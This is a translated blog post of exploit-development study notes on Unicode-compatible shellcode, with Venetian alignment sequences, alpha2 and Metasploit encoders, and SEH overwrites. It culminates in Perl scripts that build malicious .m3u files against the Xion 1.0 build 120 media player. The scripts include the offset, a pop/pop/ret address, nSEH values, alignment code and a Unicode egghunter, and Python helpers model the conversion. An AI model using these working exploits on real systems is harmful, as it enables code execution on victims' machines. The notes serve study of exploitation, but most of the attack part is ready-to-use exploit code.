Unicode exploit study notes


Unicode conversion automatically inserts NULL bytes (a 0x00 after every ASCII byte).

1) Overwriting the return address

Look for an address of the form 0x00nn00mm that holds a jmp xxx; it can jump to the shellcode and execute it.


2) SEH-based: control EIP + short jmp

Look for a pop pop ret whose entry address contains no byte > 7f, to overwrite the SEH handler.

First set nSEH to \xcc\xcc, then look for a two-byte short jmp.


3) SEH-based jump

Instead of a short jmp, overwrite nSEH with harmless code so that execution can continue past the overwritten SEH record; the code to run is placed right after the overwritten SEH structure, so once nSEH + SEH have been stepped over our code executes.

This requires:

(1) harmless instructions placed in nSEH; (2) a "unicode compatible" address to overwrite the SEH handler with, one that does no damage when executed.

When an ASCII byte is > 7f, the Unicode conversion turns it into a completely different value, e.g. 0x80 -> 1a20 -> this can be built into 0x00nn1a20.
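To see concretely why only addresses of the form 0x00nn00mm survive the conversion and what happens to a byte above 7f, here is a small Python model of the ANSI-to-UTF-16LE conversion; it is an added example, not code from the original post, and it assumes the target converts input with the cp1252 code page (cp936 is used once to show the Chinese-Windows case).

```python
import struct


def unicode_expand(data: bytes, codepage: str = "cp1252") -> bytes:
    """Model the ANSI -> UTF-16LE conversion applied to our input: decode
    each byte with the system code page, re-encode as UTF-16LE.
    Bytes < 0x80 come out as 'xx 00'; bytes >= 0x80 become whatever code
    point the code page maps them to (U+FFFD if undefined/incomplete)."""
    return data.decode(codepage, errors="replace").encode("utf-16-le")


def survives(data: bytes, codepage: str = "cp1252") -> bool:
    """True if every input byte comes out unchanged with a 0x00 after it."""
    expected = b"".join(bytes([b, 0]) for b in data)
    return unicode_expand(data, codepage) == expected


def is_unicode_compatible(addr: int) -> bool:
    """The '0x00nn00mm' rule: the input supplies only nn and mm and the
    conversion supplies the two 0x00s, so both supplied bytes must be < 0x80."""
    b = struct.pack("<I", addr)
    return b[1] == 0 and b[3] == 0 and b[0] < 0x80 and b[2] < 0x80


def address_after_conversion(addr: int, codepage: str = "cp1252"):
    """Write the two non-null bytes of addr, run the conversion and read back
    the dword that actually lands in memory (None if no full dword results)."""
    b = struct.pack("<I", addr)
    out = unicode_expand(bytes([b[0], b[2]]), codepage)
    if len(out) < 4:
        return None
    return struct.unpack("<I", out[:4])[0]


if __name__ == "__main__":
    # 0x00470034 is the pop/pop/ret address the notes below select
    print(hex(address_after_conversion(0x00470034)))   # 0x470034
    # a byte >= 0x80 becomes another code point: cp1252 0x80 -> U+20AC
    print(unicode_expand(b"\x80").hex())               # ac20
    print(hex(address_after_conversion(0x00470080)))   # 0x4720ac
    # on a cp936 (Chinese) system a lone 0xC3 is an incomplete DBCS sequence
    print(survives(b"\xc3", "cp936"))                  # False
```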


ASCII shellcode -> Unicode shellcode:

1) Find an ASCII equivalent and jump to it:

ASCII loaded into memory all becomes Unicode, so look for an ASCII version of the shellcode in memory; if EIP can be made to jump to that address, the exploit may work. If it cannot be reached, control the contents of some register, jump to that register, and place a few jump instructions there that jump to the ASCII version of the shellcode.

2) Write your own unicode-compatible shellcode

3) Use an encoder

Convert ASCII -> Unicode and put a decoder in front of it; after decoding, the original code is reproduced and executed.

(1) Rebuild the original code at a specific memory address, then jump to that address.

One register must point to the entry of decoder+shellcode, and another register must point to a writable memory address (where the shellcode is rebuilt).

(2) Change the execution flow so that it runs into the rebuilt shellcode.

A single register pointing to the entry of decoder+shellcode is enough; the original shellcode is rebuilt and stored at that same place.


Tools:

1) makeunicode2.py: didn't work out how to use it.

2) vense.pl, download: http://www.phenoelit-us.org/win

Generates a single-byte string containing decoder + original shellcode. To use the decoder, registers also have to be set up:

register 1 points directly at the entry of the buffer that holds the shellcode generated by vense.pl; register 2 must point to a writable and executable memory region into which data can be written.

shellcode entry address = eax       writable address = edi

Rewrite $secondstage as Metasploit-generated Perl shellcode; after decoding it executes normally.

Running the script 1) shows the original shellcode 2) shows the newly generated shellcode including the decoder.

Put the newly generated shellcode into the exploit and make sure eax -> shellcode entry address. !!! The registers have to be readjusted here, and the jump done with unicode-compatible code (the method is in the linked article).

Once the registers are set up, run jmp eax; the decoder extracts the original shellcode and executes it.

Notes:

(1) It cannot be used in a non-Unicode exploit. (2) Although the algorithm the script uses is the version improved by makeunicode2, it still generates very long shellcode, so a large buffer is required.

3) alpha2, download: http://download.csdn.net/detail/hksoobe/4803452

Also included in MSF; it wraps the shellcode inside a decoder.

(1) Only the register pointing to the shellcode entry has to be specified; no register pointing to a writable/executable address is needed.

(2) The decoder is not part of the original code; the decoder is self-modifying, and the buffer space required is smaller.

The MSF copy wasn't downloaded; not used.

root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin

root@bt:~/Desktop# ./alpha2 --help
Usage: ./alpha2 [OPTION] [BASEADDRESS]
ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
version of your origional shellcode. It consists of baseaddress-code with some
padding, a decoder routine and the encoded origional shellcode. This will work
for any target OS. The resulting shellcode needs to have RWE-access to modify
it's own code and decode the origional shellcode in memory.

BASEADDRESS
  The decoder routine needs have it's baseaddress in specified register(s). The
  baseaddress-code copies the baseaddress from the given register or stack
  location into the apropriate registers.
eax, ecx, edx, ecx, esp, ebp, esi, edi
  Take the baseaddress from the given register. (Unicode baseaddress code using
  esp will overwrite the byte of memory pointed to by ebp!)
[esp], [esp-X], [esp+X]
  Take the baseaddress from the stack.
seh
  The windows "Structured Exception Handler" (seh) can be used to calculate
  the baseaddress automatically on win32 systems. This option is not available
  for unicode-proof shellcodes and the uppercase version isn't 100% reliable.
nops
  No baseaddress-code, just padding.  If you need to get the baseaddress from a
  source not on the list use this option (combined with --nocompress) and
  replace the nops with your own code. The ascii decoder needs the baseaddress
  in registers ecx and edx, the unicode-proof decoder only in ecx.
-n
  Do not output a trailing newline after the shellcode.
--nocompress
  The baseaddress-code uses "dec"-instructions to lower the required padding
  length. The unicode-proof code will overwrite some bytes in front of the
  shellcode as a result. Use this option if you do not want the "dec"-s.
--unicode
  Make shellcode unicode-proof. This means it will only work when it gets
  converted to unicode (inserting a '0' after each byte) before it gets
  executed.
--uppercase
  Make shellcode 100% uppercase characters, uses a few more bytes then
  mixedcase shellcodes.
--sources
  Output a list of BASEADDRESS options for the given combination of --uppercase
  and --unicode.
--help
  Display this help and exit
--version
  Output version information and exit

See the source-files for further details and copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Acknowledgements:
  Thanks to rix for his phrack article on aphanumeric shellcode.
  Thanks to obscou for his phrack article on unicode-proof shellcode.
  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.

Report bugs to <skylined@edup.tudelft.nl>



4) metasploit

root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw | 
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)

[*] x86/unicode_upper succeeded with size 1039 (iteration=1)

my $buf = 
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" . (remaining lines omitted)

1) Only a limited instruction set is available

2) Avoid NULL bytes; the shellcode must still run correctly after the NULLs have been inserted

3) Machine-code alignment problems


Venetian shellcode technique

Make sure the NULLs and the instructions are aligned correctly.

Single bytes, once converted to Unicode, must not clobber registers or instructions; if that is still not enough, see http://phrack.org/issues/61/11.html#article

00 6e 00: add byte ptr [esi],ch
00 6f 00: add byte ptr [edi],ch
00 70 00: add byte ptr [eax],ch
00 71 00: add byte ptr [ecx],ch
00 72 00: add byte ptr [edx],ch
00 73 00: add byte ptr [ebx],ch
00 62 00: add byte ptr [edx],ah
00 6d 00: add byte ptr [ebp],ch



1) Assume ESI points to a writable address

Assume the ASCII version of the shellcode is at 0x33445566 and we want to write that into eax. Perl script:

my $align = "\xb8\x44\xaa";        #mov eax,0x0AA004400
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x50";              #push eax
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x4c";              #dec esp
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x58";              #pop eax                     ,eax=0x004400??
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x05\x55\x33";      #add eax,33005500h           ,eax=0x334455??
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\xb0";              #mov al,0
#no alignment needed between these 2!
$align=$align."\xb9\x66\xaa";      #mov ecx,AA006600h           ,eax =0x33445500

$align=$align."\xe8";              #add al,ch                   ,eax =0x33445566

# Now, when the ASCII version of the shellcode is fed into the Unicode-converting program and the instructions above run, EAX is successfully set to 0x33445566

# Next comes jmp eax

$align=$align."\xe8";              #add al,ch                   ,eax =0x33445566

$align=$align."\x6e";              #nop/align nullbytes

!!! Note: there is an error here: 0xc3 is no longer 0xc3 after conversion to Unicode,

so normally execution just runs straight on into the shellcode.

But http://bbs.pediy.com/showthread.php?t=126344

says it may be possible to construct c3:

'\x72\xcb\x72'  #ret converts to '\x72\x00\xc3\x85\x41\x00'


2) Assume we put ebp+0x100 into eax and then jump to EAX to execute code; first write some assembly:

00401580 >    55            push ebp
00401581      58            pop eax
00401582      05 00140011   add eax,0x11001400
00401587      2D 00130011   sub eax,0x11001300  EBP+0x100

Build the above code with the Venetian shellcode technique:

\x6e           #nop/align nullbytes
\x55           #push ebp
\x6e           #nop/align nullbytes
\x58           #pop eax
\x6e           #nop/align nullbytes
\x05\x14\x11   #add eax,0x11001400
\x6e           #nop/align nullbytes
\x2d\x13\x11   #sub eax,0x11001300
\x6e           #nop/align nullbytes
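As an added check of the two Venetian sequences above (eax = 0x33445566 and eax = ebp+0x100), not code from the original post: a Python model that expands the Perl bytes the way the NULL insertion does, reads the 32-bit immediates the CPU would see, and replays the register effects. The stack contents (0x41 filler) and the esp/ebp values are constructed for the demonstration.

```python
import struct


def unicode_expand(data: bytes) -> bytes:
    """Insert 0x00 after every byte (every byte used here is < 0x80)."""
    return b"".join(bytes([b, 0]) for b in data)


def imm32_after_expansion(op_and_imm16: bytes) -> int:
    """An opcode plus two immediate bytes, e.g. \\x05\\x14\\x11, expands to
    05 00 14 00 11 00: the CPU decodes 'add eax, imm32' with imm32 taken
    from expanded bytes 1..4 (0x11001400); the trailing 00 pairs with the
    next input byte (this is where 00 e8 = 'add al, ch' comes from)."""
    exp = unicode_expand(op_and_imm16)
    return struct.unpack("<I", exp[1:5])[0]


class Cpu:
    """Minimal x86 register/stack model: only what the two sequences touch."""

    def __init__(self, ebp: int, esp: int = 0x0012FF80):
        self.eax, self.ecx, self.ebp, self.esp = 0, 0, ebp, esp
        self.base = esp - 0x80                  # window of stack memory modelled
        self.mem = bytearray(b"\x41" * 0x100)   # constructed stack junk

    def push(self, v: int) -> None:
        self.esp -= 4
        o = self.esp - self.base
        self.mem[o:o + 4] = struct.pack("<I", v & 0xFFFFFFFF)

    def pop(self) -> int:
        o = self.esp - self.base
        self.esp += 4
        return struct.unpack("<I", self.mem[o:o + 4])[0]


def venetian_eax_absolute() -> int:
    """First listing: leaves eax = 0x33445566 using only bytes that survive."""
    c = Cpu(ebp=0)
    c.eax = imm32_after_expansion(b"\xb8\x44\xaa")   # mov eax, 0xAA004400
    c.push(c.eax)                                    # push eax
    c.esp -= 1                                       # dec esp
    c.eax = c.pop()                                  # pop eax -> 0x004400?? (?? = stack junk)
    c.eax = (c.eax + imm32_after_expansion(b"\x05\x55\x33")) & 0xFFFFFFFF  # add eax, 0x33005500
    c.eax &= 0xFFFFFF00                              # mov al, 0 (b0 00)
    c.ecx = imm32_after_expansion(b"\xb9\x66\xaa")   # mov ecx, 0xAA006600 -> ch = 0x66
    ch = (c.ecx >> 8) & 0xFF
    c.eax = (c.eax & 0xFFFFFF00) | ((c.eax + ch) & 0xFF)   # 00 e8 = add al, ch
    return c.eax


def venetian_eax_ebp_plus_0x100(ebp: int) -> int:
    """Second listing: push ebp / pop eax / add / sub, net effect eax = ebp + 0x100."""
    c = Cpu(ebp=ebp)
    c.push(c.ebp)                                    # push ebp
    c.eax = c.pop()                                  # pop eax
    c.eax = (c.eax + imm32_after_expansion(b"\x05\x14\x11")) & 0xFFFFFFFF  # add eax, 0x11001400
    c.eax = (c.eax - imm32_after_expansion(b"\x2d\x13\x11")) & 0xFFFFFFFF  # sub eax, 0x11001300
    return c.eax


if __name__ == "__main__":
    print(hex(venetian_eax_absolute()))                    # 0x33445566
    print(hex(venetian_eax_ebp_plus_0x100(0x0229FD76)))    # 0x229fe76
```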



Here is a worked example: xion 1.0 build 120:

Debugging in OllyDbg gives 0x235 (the offset).

Then

!pvefindaddr p2

#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe

Bytes > 7f must not be used.

0x00470034 is chosen here.

The next one was worked out with WinDbg and is not successful yet; only after further debugging did the shellcode run.

my $file = "test.m3u";
#my $junk = "A"x270;


my $nseh = "\x61\x62";#61 is popad, 62 is the align byte
my $seh =  "\x34\x47";#"\x34\x47"; pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe


my $VenetianShellcode ="\x6e";
 $VenetianShellcode =$VenetianShellcode."\x55";#55            push ebp
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x58";#58            pop eax
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011   add eax,0x11001400
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
 $VenetianShellcode =$VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222, only need 111; cannot use push eax / ret, c3 does not convert correctly to c3

                         #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch 
my $junk2  = "\x70"x111; #2)"\x70"   jo xxx   either 1 or 2 can be used as NOPs to align so that eax points to the first byte of the shellcode
#The buffer is 1840 bytes from here on, while the shellcode is 1037 bytes *2 = 2074, so the shellcode is split into two parts
my $buf = "";   # the encoded shellcode printed by the msfencode run above goes here (blob omitted)

#junk 
my $junk = 
"\x4f\x50\x4b\x51\x55\x50\x45\x52" .
"\x4c\x51\x33\x50\x36\x50\x51\x52\x4c\x52\x36\x51\x5a\x50" .
"\x4f\x54\x30\x50\x4b\x50\x4b\x50\x4b\x52\x30\x52\x32\x52" .
"\x35\x51\x37\x52\x55\x50\x4f\x50\x4b\x52\x31\x50\x57\x52" .
"\x32\x50\x33\x50\x50\x43\x42\x50\x50\x52\x4f\x51\x42\x50" .
"\x4a\x51\x35\x52\x30\x50\x56\x50\x33\x51\x39\x52\x4f\x51" .
"\x39\x51\x35\x50\x45\x50\x33\x50\x51\x54\x31\x52\x30\x52" .
"\x4c\x50\x43\x50\x53\x51\x35\x52\x30\x51\x31\x51\x31\x41" .
"\x41";
$junk = $junk."A"x(270-length($junk));

my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));

my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE);


Encoding our own shellcode into Unicode-usable shellcode:

root@bt:/opt/framework/msf3# cat exploit.m3u |   ./msfencode -e x86/alpha_mixed -t raw |    ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 277 (iteration=1)


[*] x86/unicode_upper succeeded with size 685 (iteration=1)


my $buf = 
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" . (remaining lines omitted)

The following is the correct POC. The question is: why do the POCs obtained by debugging in WinDbg and in OllyDbg (which works) differ?

And the POC derived with WinDbg is definitely wrong! The one derived with OllyDbg is the correct one.


1)  Find a pop pop ret in Unicode form to overwrite the SEH handler; !pvefindaddr p2 can find it

2)  Use popad in nSEH so that register + offset points to some position in the string we supplied

3)  Build the VenetianShellcode so that eax = some position in the string we supplied

4)  Build nop/align padding so that eax = the first byte of the shellcode

5)  Use the generated Unicode shellcode with eax = shellcode start and execute it; shellcode = decoder + code

my $file = "test.m3u";#perl
#my $junk = "A"x270;


my $nseh = "\x61\x62";#61 is popad, 62 is the align byte
my $seh =  "\x34\x47";#"\x34\x47"; pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe


my $VenetianShellcode ="\x6e";
 $VenetianShellcode =$VenetianShellcode."\x55";#55            push ebp
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x58";#58            pop eax
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011   add eax,0x11001400
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
 $VenetianShellcode =$VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222, only need 111; cannot use push eax / ret, c3 does not convert correctly to c3

my $junk2  =  "\x48\x6e"x42;               #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch 
 $junk2  = $junk2."\x70"x6; #2)"\x70"   jo xxx   either 1 or 2 can be used as NOPs to align so that eax points to the first byte of the shellcode
#The buffer is 1840 bytes from here on, while the shellcode is 1037 bytes *2 = 2074, so the shellcode is split into two parts
my $buf = "";   # the encoded shellcode printed by the msfencode run above goes here (blob omitted)

#junk 
$junk = "A"x235;

my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));

my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");  
print $FILE $payload;  
close($FILE);  

Next, build the Unicode version of egg hunting. Egg hunting handles the case where there is not enough room for characters: the shellcode is written somewhere else, then searched for and executed.

Building the shellcode:

root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin

...

root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A (rest of the output not captured)


my $file = "test.m3u";#perl
#my $junk = "A"x270;


my $nseh = "\x61\x62";#61 is popad, 62 is the align byte
my $seh =  "\x34\x47";#"\x34\x47"; pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files 2 StudiosXionXion.exe


my $VenetianShellcode ="\x6e";
 $VenetianShellcode =$VenetianShellcode."\x55";#55            push ebp
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x58";#58            pop eax
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011   add eax,0x11001400
 $VenetianShellcode =$VenetianShellcode."\x6e";
 $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
 $VenetianShellcode =$VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222, only need 111; cannot use push eax / ret, c3 does not convert correctly to c3

my $junk2  =  "\x48\x6e"x42;               #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch 
 $junk2  = $junk2."\x70"x6; #2)"\x70"   jo xxx   either 1 or 2 can be used as NOPs to align so that eax points to the first byte of the shellcode
#The buffer is 1840 bytes from here on, while the shellcode is 1037 bytes *2 = 2074, so the shellcode is split into two parts
my $egghunter = 
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA";
#the egg used is \x00\x30\x00\x74
$junk2 = $junk2.$egghunter;
my $garbage = "X"x100; # garbage code

my $aligin = "\x6d".
"\x57".  #push edi
"\x6d".
"\x58".  #pop eax
"\x6d".
"\x05\x14\x11".#05 00140011   add eax,0x11001400
"\x6d".
"\x2d\x13\x11".#2D 00130011   sub eax,0x11001300  eax+0x100
"\x6d".
"\x40".  #inc eax
"\x6d".
"\x70"x113;#note: the difference obtained from the add and sub has to be divided by 2

my $buf =("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");
#panda0#
$junk = "A"x235;

my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf));

my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE);

Original article: https://www.cnblogs.com/zcc1414/p/3982354.html